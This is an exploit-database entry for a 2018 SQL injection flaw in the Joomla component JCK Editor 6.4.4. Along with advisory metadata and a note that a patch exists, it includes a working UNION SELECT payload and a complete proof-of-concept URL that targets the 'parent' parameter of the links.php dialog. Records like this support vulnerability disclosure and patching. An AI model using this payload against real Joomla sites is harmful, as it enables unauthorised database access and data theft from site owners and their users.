header-logo
Suggest Exploit
vendor:
JCK Editor
by:
Hamza Megahed
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: JCK Editor
Affected Version From: 6.4.4
Affected Version To: 6.4.4
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:jck_editor:6.4.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu, FireFox
2018

Joomla Component JCK Editor 6.4.4 – ‘parent’ SQL Injection

Joomla Component JCK Editor 6.4.4 is vulnerable to a 'parent' SQL Injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted payload to the 'parent' parameter of the links.php page. The payload is 'UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa'. This will allow the attacker to execute arbitrary SQL queries on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of the JCK Editor.
Source

Exploit-DB raw data:

# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
# Date: 2018-09-14
# Exploit Author: Hamza Megahed
# Vendor Homepage:https://www.joomla.org/
# Download: https://arkextensions.com/products/jck-editor
# Version: 6.4.4
# Tested on: Ubuntu, FireFox,
# CVE: N/A

# Parameter = parent
# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
# Poc:

Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa